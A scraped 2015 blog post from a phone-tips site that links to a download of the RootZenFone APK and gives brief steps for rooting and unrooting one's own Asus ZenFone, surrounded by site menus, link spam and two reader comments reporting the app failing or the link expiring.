</div></div></div><div class="td-next-prev-wrap"><a href="#" class="td-ajax-prev-page ajax-page-disabled" id="prev-page-td_uid_1_5a35de9c6729e" data-td_block_id="td_uid_1_5a35de9c6729e"><i class="td-icon-font td-icon-menu-left"></i></a><a href="#" class="td-ajax-next-page" id="next-page-td_uid_1_5a35de9c6729e" data-td_block_id="td_uid_1_5a35de9c6729e"><i class="td-icon-font td-icon-menu-right"></i></a></div><div class="clearfix"></div></div> </div></div></li>
</ul>
</li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-mega-menu menu-item-1237"><a title="Samsung Phones" href="http://www.ninjaromeo.com/category/samsung/">Samsung</a>
<ul class="sub-menu">
<li class="menu-item-0"><div class="td-container-border"><div class="td-mega-grid"><div class="td_block_wrap td_block_mega_menu td_uid_2_5a35de9c6d65d_rand td-no-subcats td_with_ajax_pagination td-pb-border-top" data-td-block-uid="td_uid_2_5a35de9c6d65d"><script>var block_td_uid_2_5a35de9c6d65d = new tdBlock();
block_td_uid_2_5a35de9c6d65d.id = "td_uid_2_5a35de9c6d65d";
block_td_uid_2_5a35de9c6d65d.atts = '{"limit":"5","sort":"","post_ids":"","tag_slug":"","autors_id":"","installed_post_types":"","category_id":"87","category_ids":"","custom_title":"","custom_url":"","show_child_cat":30,"sub_cat_ajax":"","ajax_pagination":"next_prev","header_color":"","header_text_color":"","ajax_pagination_infinite_stop":"","td_column_number":3,"td_ajax_preloading":"","td_ajax_filter_type":"td_category_ids_filter","td_ajax_filter_ids":"","td_filter_default_txt":"All","color_preset":"","border_top":"","class":"td_uid_2_5a35de9c6d65d_rand","el_class":"","offset":"","css":"","tdc_css":"","tdc_css_class":"td_uid_2_5a35de9c6d65d_rand","live_filter":"","live_filter_cur_post_id":"","live_filter_cur_post_author":""}';
block_td_uid_2_5a35de9c6d65d.td_column_number = "3";
block_td_uid_2_5a35de9c6d65d.block_type = "td_block_mega_menu";
block_td_uid_2_5a35de9c6d65d.post_count = "5";
block_td_uid_2_5a35de9c6d65d.found_posts = "108";
block_td_uid_2_5a35de9c6d65d.header_color = "";
block_td_uid_2_5a35de9c6d65d.ajax_pagination_infinite_stop = "";
block_td_uid_2_5a35de9c6d65d.max_num_pages = "22";
tdBlocksArray.push(block_td_uid_2_5a35de9c6d65d);
</script><div id=td_uid_2_5a35de9c6d65d class="td_block_inner"><div class="td-mega-row"><div class="td-mega-span">
<div class="td_module_mega_menu td_mod_mega_menu">
<div class="td-module-image">
<div class="td-module-thumb"><a href="http://www.ninjaromeo.com/record-slow-motion-video-galaxy-note-7/" rel="bookmark" title="Record Slow Motion video on Samsung Galaxy Note 7 [How to]"><img width="218" height="150" class="entry-thumb" src="http://www.ninjaromeo.com/wp-content/uploads/2016/08/galaxy-note-7-slow-motion-218x150.jpg" srcset="http://www.ninjaromeo.com/wp-content/uploads/2016/08/galaxy-note-7-slow-motion-218x150.jpg 218w, http://www.ninjaromeo.com/wp-content/uploads/2016/08/galaxy-note-7-slow-motion-100x70.jpg 100w, http://www.ninjaromeo.com/wp-content/uploads/2016/08/galaxy-note-7-slow-motion-534x370.jpg 534w" sizes="(max-width: 218px) 100vw, 218px" alt="Galaxy Note 7 - record slow motion video" title="Record Slow Motion video on Samsung Galaxy Note 7 [How to]" /></a></div> </div>
<div class="item-details">
<h3 class="entry-title td-module-title"><a href="http://www.ninjaromeo.com/record-slow-motion-video-galaxy-note-7/" rel="bookmark" title="Record Slow Motion video on Samsung Galaxy Note 7 [How to]">Record Slow Motion video on Samsung Galaxy Note 7 [How to]</a></h3> </div>
</div>
</div><div class="td-mega-span">
<div class="td_module_mega_menu td_mod_mega_menu">
<div class="td-module-image">
<div class="td-module-thumb"><a href="http://www.ninjaromeo.com/volume-dual-speaker-galaxy-s7-edge/" rel="bookmark" title="Increase Volume and Use Dual Speaker in Galaxy S7 and Galaxy S7 Edge by flashing The Sound Mod"><img width="218" height="150" class="entry-thumb" src="http://www.ninjaromeo.com/wp-content/uploads/2016/05/galaxy-s7-edge-sound-mod-218x150.jpg" srcset="http://www.ninjaromeo.com/wp-content/uploads/2016/05/galaxy-s7-edge-sound-mod-218x150.jpg 218w, http://www.ninjaromeo.com/wp-content/uploads/2016/05/galaxy-s7-edge-sound-mod-100x70.jpg 100w" sizes="(max-width: 218px) 100vw, 218px" alt="increase sound volume and use dual speakers in samsung galaxy s7 and edge" title="Increase Volume and Use Dual Speaker in Galaxy S7 and Galaxy S7 Edge by flashing The Sound Mod" /></a></div> </div>
<div class="item-details">
<h3 class="entry-title td-module-title"><a href="http://www.ninjaromeo.com/volume-dual-speaker-galaxy-s7-edge/" rel="bookmark" title="Increase Volume and Use Dual Speaker in Galaxy S7 and Galaxy S7 Edge by flashing The Sound Mod">Increase Volume and Use Dual Speaker in Galaxy S7 and Galaxy&#8230;</a></h3> </div>
</div>
</div><div class="td-mega-span">
<div class="td_module_mega_menu td_mod_mega_menu">
<div class="td-module-image">
<div class="td-module-thumb"><a href="http://www.ninjaromeo.com/galaxy-s7-edge-camera-download-install/" rel="bookmark" title="Samsung Galaxy S7 Edge Camera &#8211; Download &#038; Install"><img width="218" height="150" class="entry-thumb" src="http://www.ninjaromeo.com/wp-content/uploads/2016/05/samsung-s7-edge-camera-app-218x150.jpg" srcset="http://www.ninjaromeo.com/wp-content/uploads/2016/05/samsung-s7-edge-camera-app-218x150.jpg 218w, http://www.ninjaromeo.com/wp-content/uploads/2016/05/samsung-s7-edge-camera-app-100x70.jpg 100w" sizes="(max-width: 218px) 100vw, 218px" alt="Samsung Galaxy s7 edge camera apk app download" title="Samsung Galaxy S7 Edge Camera &#8211; Download &#038; Install" /></a></div> </div>
<div class="item-details">
<h3 class="entry-title td-module-title"><a href="http://www.ninjaromeo.com/galaxy-s7-edge-camera-download-install/" rel="bookmark" title="Samsung Galaxy S7 Edge Camera &#8211; Download &#038; Install">Samsung Galaxy S7 Edge Camera &#8211; Download &#038; Install</a></h3> </div>
</div>
</div><div class="td-mega-span">
<div class="td_module_mega_menu td_mod_mega_menu">
<div class="td-module-image">
<div class="td-module-thumb"><a href="http://www.ninjaromeo.com/solve-galaxy-s6-gallery-not-showing-pictures/" rel="bookmark" title="How to solve Samsung Galaxy S6 Gallery not showing pictures"><img width="218" height="150" class="entry-thumb" src="http://www.ninjaromeo.com/wp-content/uploads/2015/06/samsung-Galaxy-6-gallery-image-not-showing-218x150.jpg" srcset="http://www.ninjaromeo.com/wp-content/uploads/2015/06/samsung-Galaxy-6-gallery-image-not-showing-218x150.jpg 218w, http://www.ninjaromeo.com/wp-content/uploads/2015/06/samsung-Galaxy-6-gallery-image-not-showing-100x70.jpg 100w" sizes="(max-width: 218px) 100vw, 218px" alt="Samsung Galaxy S6 image not showing in gallery" title="How to solve Samsung Galaxy S6 Gallery not showing pictures" /></a></div> </div>
<div class="item-details">
<h3 class="entry-title td-module-title"><a href="http://www.ninjaromeo.com/solve-galaxy-s6-gallery-not-showing-pictures/" rel="bookmark" title="How to solve Samsung Galaxy S6 Gallery not showing pictures">How to solve Samsung Galaxy S6 Gallery not showing pictures</a></h3> </div>
</div>
</div><div class="td-mega-span">
<div class="td_module_mega_menu td_mod_mega_menu">
<div class="td-module-image">
<div class="td-module-thumb"><a href="http://www.ninjaromeo.com/disable-demo-retail-mode-galaxy-s6-edge/" rel="bookmark" title="How to Disable Demo Retail Mode on Samsung Galaxy S6 &#038; S6 Edge"><img width="200" height="150" class="entry-thumb" src="http://www.ninjaromeo.com/wp-content/uploads/2015/05/galaxy-s6-edge-demo-retail-mode-200x150.jpg" srcset="http://www.ninjaromeo.com/wp-content/uploads/2015/05/galaxy-s6-edge-demo-retail-mode-200x150.jpg 200w, http://www.ninjaromeo.com/wp-content/uploads/2015/05/galaxy-s6-edge-demo-retail-mode-80x60.jpg 80w" sizes="(max-width: 200px) 100vw, 200px" alt="disable galaxy s6 edge demo retail mode" title="How to Disable Demo Retail Mode on Samsung Galaxy S6 &#038; S6 Edge" /></a></div> </div>
<div class="item-details">
<h3 class="entry-title td-module-title"><a href="http://www.ninjaromeo.com/disable-demo-retail-mode-galaxy-s6-edge/" rel="bookmark" title="How to Disable Demo Retail Mode on Samsung Galaxy S6 &#038; S6 Edge">How to Disable Demo Retail Mode on Samsung Galaxy S6 &#038;&#8230;</a></h3> </div>
</div>
</div></div></div><div class="td-next-prev-wrap"><a href="#" class="td-ajax-prev-page ajax-page-disabled" id="prev-page-td_uid_2_5a35de9c6d65d" data-td_block_id="td_uid_2_5a35de9c6d65d"><i class="td-icon-font td-icon-menu-left"></i></a><a href="#" class="td-ajax-next-page" id="next-page-td_uid_2_5a35de9c6d65d" data-td_block_id="td_uid_2_5a35de9c6d65d"><i class="td-icon-font td-icon-menu-right"></i></a></div><div class="clearfix"></div></div> </div></div></li>
</ul>
</li>
<li class="menu-item menu-item-type-custom menu-item-object-custom td-menu-item td-normal-menu menu-item-2065"><a href="http://www.ninjaromeo.com/category/htc/">HTC</a></li>
<li class="menu-item menu-item-type-custom menu-item-object-custom td-menu-item td-normal-menu menu-item-2068"><a href="http://www.ninjaromeo.com/category/sony/">Sony</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-mega-menu menu-item-747"><a title="Guides for you" href="http://www.ninjaromeo.com/category/how-to-guide/">How to Guide</a>
<ul class="sub-menu">
<li class="menu-item-0"><div class="td-container-border"><div class="td-mega-grid"><div class="td_block_wrap td_block_mega_menu td_uid_3_5a35de9c72732_rand td_with_ajax_pagination td-pb-border-top" data-td-block-uid="td_uid_3_5a35de9c72732"><script>var block_td_uid_3_5a35de9c72732 = new tdBlock();
block_td_uid_3_5a35de9c72732.id = "td_uid_3_5a35de9c72732";
block_td_uid_3_5a35de9c72732.atts = '{"limit":4,"sort":"","post_ids":"","tag_slug":"","autors_id":"","installed_post_types":"","category_id":"6","category_ids":"","custom_title":"","custom_url":"","show_child_cat":30,"sub_cat_ajax":"","ajax_pagination":"next_prev","header_color":"","header_text_color":"","ajax_pagination_infinite_stop":"","td_column_number":3,"td_ajax_preloading":"","td_ajax_filter_type":"td_category_ids_filter","td_ajax_filter_ids":"","td_filter_default_txt":"All","color_preset":"","border_top":"","class":"td_uid_3_5a35de9c72732_rand","el_class":"","offset":"","css":"","tdc_css":"","tdc_css_class":"td_uid_3_5a35de9c72732_rand","live_filter":"","live_filter_cur_post_id":"","live_filter_cur_post_author":""}';
block_td_uid_3_5a35de9c72732.td_column_number = "3";
block_td_uid_3_5a35de9c72732.block_type = "td_block_mega_menu";
block_td_uid_3_5a35de9c72732.post_count = "4";
block_td_uid_3_5a35de9c72732.found_posts = "61";
block_td_uid_3_5a35de9c72732.header_color = "";
block_td_uid_3_5a35de9c72732.ajax_pagination_infinite_stop = "";
block_td_uid_3_5a35de9c72732.max_num_pages = "16";
tdBlocksArray.push(block_td_uid_3_5a35de9c72732);
</script><div class="td_mega_menu_sub_cats"><div class="block-mega-child-cats"><a class="cur-sub-cat mega-menu-sub-cat-td_uid_3_5a35de9c72732" id="td_uid_4_5a35de9c730ba" data-td_block_id="td_uid_3_5a35de9c72732" data-td_filter_value="" href="http://www.ninjaromeo.com/category/how-to-guide/">All</a><a class="mega-menu-sub-cat-td_uid_3_5a35de9c72732" id="td_uid_5_5a35de9c73158" data-td_block_id="td_uid_3_5a35de9c72732" data-td_filter_value="521" href="http://www.ninjaromeo.com/category/how-to-guide/delete-account/">Delete account</a></div></div><div id=td_uid_3_5a35de9c72732 class="td_block_inner"><div class="td-mega-row"><div class="td-mega-span">
<div class="td_module_mega_menu td_mod_mega_menu">
<div class="td-module-image">
<div class="td-module-thumb"><a href="http://www.ninjaromeo.com/6-tips-make-travel-photos-insta-worthy/" rel="bookmark" title="6 tips to make your travel photos insta worthy"><img width="218" height="150" class="entry-thumb" src="http://www.ninjaromeo.com/wp-content/uploads/2017/10/make-your-travel-photos-instagram-worthy-218x150.jpg" srcset="http://www.ninjaromeo.com/wp-content/uploads/2017/10/make-your-travel-photos-instagram-worthy-218x150.jpg 218w, http://www.ninjaromeo.com/wp-content/uploads/2017/10/make-your-travel-photos-instagram-worthy-100x70.jpg 100w" sizes="(max-width: 218px) 100vw, 218px" alt="make your travel photos instagram worthy" title="6 tips to make your travel photos insta worthy" /></a></div> </div>
<div class="item-details">
<h3 class="entry-title td-module-title"><a href="http://www.ninjaromeo.com/6-tips-make-travel-photos-insta-worthy/" rel="bookmark" title="6 tips to make your travel photos insta worthy">6 tips to make your travel photos insta worthy</a></h3> </div>
</div>
</div><div class="td-mega-span">
<div class="td_module_mega_menu td_mod_mega_menu">
<div class="td-module-image">
<div class="td-module-thumb"><a href="http://www.ninjaromeo.com/attributes-application-performance-management/" rel="bookmark" title="The Many Attributes of Application Performance Management"><img width="218" height="150" class="entry-thumb" src="http://www.ninjaromeo.com/wp-content/uploads/2017/10/Application-Performance-Management-218x150.jpg" srcset="http://www.ninjaromeo.com/wp-content/uploads/2017/10/Application-Performance-Management-218x150.jpg 218w, http://www.ninjaromeo.com/wp-content/uploads/2017/10/Application-Performance-Management-100x70.jpg 100w" sizes="(max-width: 218px) 100vw, 218px" alt="Application Performance Management" title="The Many Attributes of Application Performance Management" /></a></div> </div>
<div class="item-details">
<h3 class="entry-title td-module-title"><a href="http://www.ninjaromeo.com/attributes-application-performance-management/" rel="bookmark" title="The Many Attributes of Application Performance Management">The Many Attributes of Application Performance Management</a></h3> </div>
</div>
</div><div class="td-mega-span">
<div class="td_module_mega_menu td_mod_mega_menu">
<div class="td-module-image">
<div class="td-module-thumb"><a href="http://www.ninjaromeo.com/best-casino-sites-for-2017/" rel="bookmark" title="Best Casino Sites for 2017"><img width="218" height="150" class="entry-thumb" src="http://www.ninjaromeo.com/wp-content/uploads/2017/07/best-casino-sites-218x150.jpg" srcset="http://www.ninjaromeo.com/wp-content/uploads/2017/07/best-casino-sites-218x150.jpg 218w, http://www.ninjaromeo.com/wp-content/uploads/2017/07/best-casino-sites-100x70.jpg 100w" sizes="(max-width: 218px) 100vw, 218px" alt="" title="Best Casino Sites for 2017" /></a></div> </div>
<div class="item-details">
<h3 class="entry-title td-module-title"><a href="http://www.ninjaromeo.com/best-casino-sites-for-2017/" rel="bookmark" title="Best Casino Sites for 2017">Best Casino Sites for 2017</a></h3> </div>
</div>
</div><div class="td-mega-span">
<div class="td_module_mega_menu td_mod_mega_menu">
<div class="td-module-image">
<div class="td-module-thumb"><a href="http://www.ninjaromeo.com/best-sites-save-money-online-casino/" rel="bookmark" title="Best sites if you trying to save money playing online casino"><img width="218" height="150" class="entry-thumb" src="http://www.ninjaromeo.com/wp-content/uploads/2017/07/online-casino-218x150.jpg" srcset="http://www.ninjaromeo.com/wp-content/uploads/2017/07/online-casino-218x150.jpg 218w, http://www.ninjaromeo.com/wp-content/uploads/2017/07/online-casino-100x70.jpg 100w" sizes="(max-width: 218px) 100vw, 218px" alt="" title="Best sites if you trying to save money playing online casino" /></a></div> </div>
<div class="item-details">
<h3 class="entry-title td-module-title"><a href="http://www.ninjaromeo.com/best-sites-save-money-online-casino/" rel="bookmark" title="Best sites if you trying to save money playing online casino">Best sites if you trying to save money playing online casino</a></h3> </div>
</div>
</div></div></div><div class="td-next-prev-wrap"><a href="#" class="td-ajax-prev-page ajax-page-disabled" id="prev-page-td_uid_3_5a35de9c72732" data-td_block_id="td_uid_3_5a35de9c72732"><i class="td-icon-font td-icon-menu-left"></i></a><a href="#" class="td-ajax-next-page" id="next-page-td_uid_3_5a35de9c72732" data-td_block_id="td_uid_3_5a35de9c72732"><i class="td-icon-font td-icon-menu-right"></i></a></div><div class="clearfix"></div></div> </div></div></li>
</ul>
</li>
</ul></div></div>
<div class="td-search-wrapper">
<div id="td-top-search">

<div class="header-search-wrap">
<div class="dropdown header-search">
<a id="td-header-search-button" href="#" role="button" class="dropdown-toggle " data-toggle="dropdown"><i class="td-icon-search"></i></a>
<a id="td-header-search-button-mob" href="#" role="button" class="dropdown-toggle " data-toggle="dropdown"><i class="td-icon-search"></i></a>
</div>
</div>
</div>
</div>
<div class="header-search-wrap">
<div class="dropdown header-search">
<div class="td-drop-down-search" aria-labelledby="td-header-search-button">
<form method="get" class="td-search-form" action="http://www.ninjaromeo.com/">
<div role="search" class="td-head-form-search-wrap">
<input id="td-header-search" type="text" value="" name="s" autocomplete="off" /><input class="wpb_button wpb_btn-inverse btn" type="submit" id="td-header-search-top" value="Search" />
</div>
</form>
<div id="td-aj-search"></div>
</div>
</div>
</div> </div>
</div>
</div>
</div>
<div class="td-banner-wrap-full">
<div class="td-container-header td-header-row td-header-header">
<div class="td-header-sp-recs">
<div class="td-header-rec-wrap">
</div> </div>
</div>
</div>
</div><div class="td-main-content-wrap">
<div class="td-container td-post-template-default ">
<div class="td-crumb-container"><div class="entry-crumbs" itemscope itemtype="http://schema.org/BreadcrumbList"><span class="td-bred-first"><a href="http://www.ninjaromeo.com/">Home</a></span> <i class="td-icon-right td-bread-sep"></i> <span itemscope itemprop="itemListElement" itemtype="http://schema.org/ListItem">
<a title="View all posts in Asus" class="entry-crumb" itemscope itemprop="item" itemtype="http://schema.org/Thing" href="http://www.ninjaromeo.com/category/asus/">
<span itemprop="name">Asus</span> </a> <meta itemprop="position" content="1"></span> <i class="td-icon-right td-bread-sep td-bred-no-url-last"></i> <span class="td-bred-no-url-last">Download Root ZenFone 1.4.6.4r APK </span></div></div>
<div class="td-pb-row">
<div class="td-pb-span8 td-main-content" role="main">
<div class="td-ss-main-content">
<article id="post-4433" class="post-4433 post type-post status-publish format-standard has-post-thumbnail hentry category-asus tag-download-apk tag-root tag-zenfone-4 tag-zenfone-5 tag-zenfone-6" itemscope itemtype="http://schema.org/Article">
<div class="td-post-header">
<ul class="td-category"><li class="entry-category"><a href="http://www.ninjaromeo.com/category/asus/">Asus</a></li></ul>
<header class="td-post-title">
<h1 class="entry-title">Download Root ZenFone 1.4.6.4r APK [free]</h1>
<div class="td-module-meta-info">
<div class="td-post-author-name"><div class="td-author-by">By</div> <a href="http://www.ninjaromeo.com/author/panneer/">Panneer Selvan</a><div class="td-author-line"> - </div> </div> <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2015-05-09T10:02:13+00:00">May 9, 2015</time></span> </div>
</header>
</div>
<div class="td-post-content">
<div class="td-post-featured-image"><img width="211" height="241" class="entry-thumb" src="http://www.ninjaromeo.com/wp-content/uploads/2015/05/ROOT-ZenFone-APK.jpg" alt="rootzenfone apk download" title="ROOT-ZenFone-APK" /></div>
<div class="at-above-post addthis_tool" data-url="http://www.ninjaromeo.com/download-root-zenfone-1-4-6-4r-apk/"></div><p><strong>RootZenFone 1.4.6.4r APK</strong> will give you an access to root the Asus Zenfone models like Zenfone 4, Zenfone 5, Zenfone 6. You can easily root the Asus mobiles with this app on your mobile without a computer or laptop. The RootZenFone is a great app which is giving you a full access to root and unroot the phone. This is a latest version of RootZenFone that you can <strong>download</strong> it from this guide.</p>
<p><a rel="nofollow" href="http://www.ninjaromeo.com/wp-content/uploads/2015/05/ROOT-ZenFone-APK.jpg"><img class="alignright size-full wp-image-4434" src="http://www.ninjaromeo.com/wp-content/uploads/2015/05/ROOT-ZenFone-APK.jpg" alt="rootzenfone apk download" width="211" height="241" /></a></p>
<p>If Asus releases a new update to your phone, then it will be useless to you. Now the updated version <em>RootZenFone 1.4.6.4r apk</em> was released and tested that it is working on Zenfone 4, Zenfone 5, Zenfone6, Fonepad 7 FE375CG (K019),FonePad Note 6 ME560CG, Transformer Pad TF103C, Transformer Pad TF303CL, Zenfone 5 LTE T00P, Zenfone 4 T00I, Zenfone 6 T00G.</p>
<h2>Download RootZenFone 1.4.6.4r APK free:</h2>
<ul>
<li>Go to the link to download it &#8211; <a href="https://www.asuswebstorage.com/navigate/s/FAE54A692A7E42CEAE2CD80548EE97B5Y" target="_blank" rel="nofollow">here</a></li>
<li>Now connect the phone to transfer the downloaded file.</li>
<li>Once it transferred, follow the on-screen instructions to root your mobile.</li>
<li>If the rooting process succeeds, you will see the Super SU app installed on your phone.</li>
<li>To unroot the phone, Open the app and tap the Unroot button.</li>
</ul>
<p>Similar guides for you:-</p>
<p><a href="http://www.ninjaromeo.com/download-lg-g4-apps-g3-ported-apk-zip/">Download LG G4 Apps for LG G3 with Ported APK ZIP [How to Install]</a></p>
<p><a href="http://www.ninjaromeo.com/champcash-earn-money-installing-apps-refer/">Champcash – Earn Unlimited money by installing Apps and Refer</a></p>
<p>We hope that this article helped you a lot. Share your thoughts in the comment section if you have any doubt. Stay connected with us by Facebook fan, Twitter follower and Google Plus follower. Now you successfully <span style="text-decoration: underline;">downloaded the RootZenFone 1.4.6.4r APK for Android Asus Smartphones</span>.</p>
<h4>Incoming search terms:</h4><ul><li>root zenfone apk</li><li>Dolby atmos apk free download</li><li>zenfone root apk</li><li>RootZenFone-1 4 4r apk</li><li>root ZenFone APK download</li><li>RootZenfone apk</li><li>root zenfone 5 apk</li><li>Download ROOT ZenFone APK</li><li>download root zenfone</li><li>asus root apk</li></ul><div class="at-below-post addthis_tool" data-url="http://www.ninjaromeo.com/download-root-zenfone-1-4-6-4r-apk/"></div> </div>
<footer>
<div class="td-post-source-tags">
<ul class="td-tags td-post-small-box clearfix"><li><span>TAGS</span></li><li><a href="http://www.ninjaromeo.com/tag/download-apk/">download apk</a></li><li><a href="http://www.ninjaromeo.com/tag/root/">root</a></li><li><a href="http://www.ninjaromeo.com/tag/zenfone-4/">zenfone 4</a></li><li><a href="http://www.ninjaromeo.com/tag/zenfone-5/">zenfone 5</a></li><li><a href="http://www.ninjaromeo.com/tag/zenfone-6/">zenfone 6</a></li></ul> </div>
<div class="td-block-row td-post-next-prev"><div class="td-block-span6 td-post-prev-post"><div class="td-post-next-prev-content"><span>Previous article</span><a href="http://www.ninjaromeo.com/download-lg-g4-apps-g3-ported-apk-zip/">Download LG G4 Apps for LG G3 with Ported APK ZIP [How to Install]</a></div></div><div class="td-next-prev-separator"></div><div class="td-block-span6 td-post-next-post"><div class="td-post-next-prev-content"><span>Next article</span><a href="http://www.ninjaromeo.com/unroot-asus-zenfone-4-5-6-without-computer/">Unroot Asus Zenfone 4, 5 &#038; 6 without Computer using Root Zenfone app</a></div></div></div> <div class="author-box-wrap"><a href="http://www.ninjaromeo.com/author/panneer/"></a><div class="desc"><div class="td-author-name vcard author"><span class="fn"><a href="http://www.ninjaromeo.com/author/panneer/">Panneer Selvan</a></span></div><div class="td-author-url"><a href="http://www.ninjaromeo.com/author/Panneer/">http://www.ninjaromeo.com/author/Panneer/</a></div><div class="td-author-description">A Blogger, A Photographer, A Gadget freaky, A Gamer and An addictive Android lover.</div><div class="td-author-social">
<span class="td-social-icon-wrap">
<a target="_blank" href="https://plus.google.com/+PanneerScullyBoySelvan/" title="Google+">
<i class="td-icon-font td-icon-googleplus"></i>
</a>
</span></div><div class="clearfix"></div></div></div> <span style="display: none;" itemprop="author" itemscope itemtype="https://schema.org/Person"><meta itemprop="name" content="Panneer Selvan"></span><meta itemprop="datePublished" content="2015-05-09T10:02:13+00:00"><meta itemprop="dateModified" content="2015-05-09T10:44:40+00:00"><meta itemscope itemprop="mainEntityOfPage" itemType="https://schema.org/WebPage" itemid="http://www.ninjaromeo.com/download-root-zenfone-1-4-6-4r-apk/" /><span style="display: none;" itemprop="publisher" itemscope itemtype="https://schema.org/Organization"><span style="display: none;" itemprop="logo" itemscope itemtype="https://schema.org/ImageObject"><meta itemprop="url" content="https://www.ninjaromeo.com/wp-content/uploads/2016/09/Logo-new.png"></span><meta itemprop="name" content="Ninja Romeo"></span><meta itemprop="headline " content="Download Root ZenFone 1.4.6.4r APK [free]"><span style="display: none;" itemprop="image" itemscope itemtype="https://schema.org/ImageObject"><meta itemprop="url" content="http://www.ninjaromeo.com/wp-content/uploads/2015/05/ROOT-ZenFone-APK.jpg"><meta itemprop="width" content="211"><meta itemprop="height" content="241"></span> </footer>
</article> 
<div class="td_block_wrap td_block_related_posts td_uid_7_5a35de9cb23b7_rand td_with_ajax_pagination td-pb-border-top" data-td-block-uid="td_uid_7_5a35de9cb23b7"><script>var block_td_uid_7_5a35de9cb23b7 = new tdBlock();
block_td_uid_7_5a35de9cb23b7.id = "td_uid_7_5a35de9cb23b7";
block_td_uid_7_5a35de9cb23b7.atts = '{"limit":3,"sort":"","post_ids":"","tag_slug":"","autors_id":"","installed_post_types":"","category_id":"","category_ids":"","custom_title":"","custom_url":"","show_child_cat":"","sub_cat_ajax":"","ajax_pagination":"next_prev","header_color":"","header_text_color":"","ajax_pagination_infinite_stop":"","td_column_number":3,"td_ajax_preloading":"","td_ajax_filter_type":"td_custom_related","td_ajax_filter_ids":"","td_filter_default_txt":"All","color_preset":"","border_top":"","class":"td_uid_7_5a35de9cb23b7_rand","el_class":"","offset":"","css":"","tdc_css":"","tdc_css_class":"td_uid_7_5a35de9cb23b7_rand","live_filter":"cur_post_same_categories","live_filter_cur_post_id":4433,"live_filter_cur_post_author":"1"}';
block_td_uid_7_5a35de9cb23b7.td_column_number = "3";
block_td_uid_7_5a35de9cb23b7.block_type = "td_block_related_posts";
block_td_uid_7_5a35de9cb23b7.post_count = "1";
block_td_uid_7_5a35de9cb23b7.found_posts = "1";
block_td_uid_7_5a35de9cb23b7.header_color = "";
block_td_uid_7_5a35de9cb23b7.ajax_pagination_infinite_stop = "";
block_td_uid_7_5a35de9cb23b7.max_num_pages = "1";
tdBlocksArray.push(block_td_uid_7_5a35de9cb23b7);
</script><h4 class="td-related-title"><a id="td_uid_8_5a35de9cb2c91" class="td-related-left td-cur-simple-item" data-td_filter_value="" data-td_block_id="td_uid_7_5a35de9cb23b7" href="#">RELATED ARTICLES</a><a id="td_uid_9_5a35de9cb2ccb" class="td-related-right" data-td_filter_value="td_related_more_from_author" data-td_block_id="td_uid_7_5a35de9cb23b7" href="#">MORE FROM AUTHOR</a></h4><div id=td_uid_7_5a35de9cb23b7 class="td_block_inner">
<div class="td-related-row">
<div class="td-related-span4">
<div class="td_module_related_posts td-animation-stack td_mod_related_posts">
<div class="td-module-image">
<div class="td-module-thumb"><a href="http://www.ninjaromeo.com/unroot-asus-zenfone-4-5-6-without-computer/" rel="bookmark" title="Unroot Asus Zenfone 4, 5 &#038; 6 without Computer using Root Zenfone app"><img width="218" height="150" class="entry-thumb" src="http://www.ninjaromeo.com/wp-content/uploads/2015/05/zenfone-4-5-6-un-root-218x150.jpg" srcset="http://www.ninjaromeo.com/wp-content/uploads/2015/05/zenfone-4-5-6-un-root-218x150.jpg 218w, http://www.ninjaromeo.com/wp-content/uploads/2015/05/zenfone-4-5-6-un-root.jpg 300w, http://www.ninjaromeo.com/wp-content/uploads/2015/05/zenfone-4-5-6-un-root-100x70.jpg 100w" sizes="(max-width: 218px) 100vw, 218px" alt="un root zenfone 4 zenfone 5 zenfone 6 without computer" title="Unroot Asus Zenfone 4, 5 &#038; 6 without Computer using Root Zenfone app" /></a></div> </div>
<div class="item-details">
<h3 class="entry-title td-module-title"><a href="http://www.ninjaromeo.com/unroot-asus-zenfone-4-5-6-without-computer/" rel="bookmark" title="Unroot Asus Zenfone 4, 5 &#038; 6 without Computer using Root Zenfone app">Unroot Asus Zenfone 4, 5 &#038; 6 without Computer using Root Zenfone app</a></h3> </div>
</div>
</div> </div></div><div class="td-next-prev-wrap"><a href="#" class="td-ajax-prev-page ajax-page-disabled" id="prev-page-td_uid_7_5a35de9cb23b7" data-td_block_id="td_uid_7_5a35de9cb23b7"><i class="td-icon-font td-icon-menu-left"></i></a><a href="#" class="td-ajax-next-page ajax-page-disabled" id="next-page-td_uid_7_5a35de9cb23b7" data-td_block_id="td_uid_7_5a35de9cb23b7"><i class="td-icon-font td-icon-menu-right"></i></a></div></div> 
<div id="disqus_thread">
<div id="dsq-content">
<ul id="dsq-comments">
<li class="comment even thread-even depth-1" id="dsq-comment-6568">
<div id="dsq-comment-header-6568" class="dsq-comment-header">
<cite id="dsq-cite-6568">
<span id="dsq-author-user-6568">Mridul Dhar</span>
</cite>
</div>
<div id="dsq-comment-body-6568" class="dsq-comment-body">
<div id="dsq-comment-message-6568" class="dsq-comment-message"><p>Did not work on my Zenfone 4 Lollipop. Says &#8221; Failed 🙁 &#8220;</p>
</div>
</div>
</li>
<li class="comment odd alt thread-odd thread-alt depth-1" id="dsq-comment-6734">
<div id="dsq-comment-header-6734" class="dsq-comment-header">
<cite id="dsq-cite-6734">
<span id="dsq-author-user-6734">renics nikoros</span>
</cite>
</div>
<div id="dsq-comment-body-6734" class="dsq-comment-body">
<div id="dsq-comment-message-6734" class="dsq-comment-message"><p>?? ???????? ??????. The term of sharing of public content expired, or it is removed by the owner.</p>
</div>
</div>
</li>
</ul>
</div>
</div>
<script type="text/javascript">
var disqus_url = 'http://www.ninjaromeo.com/download-root-zenfone-1-4-6-4r-apk/';
var disqus_identifier = '4433 http://www.ninjaromeo.com/?p=4433';
var disqus_container_id = 'disqus_thread';
var disqus_shortname = 'ninjaromeo';
var disqus_title = "Download Root ZenFone 1.4.6.4r APK [free]";
var disqus_config_custom = window.disqus_config;
var disqus_config = function () {
    /*
    All currently supported events:
    onReady: fires when everything is ready,
    onNewComment: fires when a new comment is posted,
    onIdentify: fires when user is authenticated
    */
    
    this.page.remote_auth_s3 = 'W10= fb343742e074501c6fba73a6cfdf6f78f5636b34 1513479836';
this.page.api_key = '8WCrlfKzl4Hnx9D2K3mQbymjj3ZzCccEaOWbdSjphAGRaUdfnLkrqQ6gEQBFq6CP';
this.sso = {
          name: "Ninja Romeo",
          button: "",
          url: "http://www.ninjaromeo.com/wp-login.php",
          logout: "http://www.ninjaromeo.com/wp-login.php?action=logout",
          width: "800",
          height: "700"
    };
    this.language = '';
        this.callbacks.onReady.push(function () {

        // sync comments in the background so we don't block the page
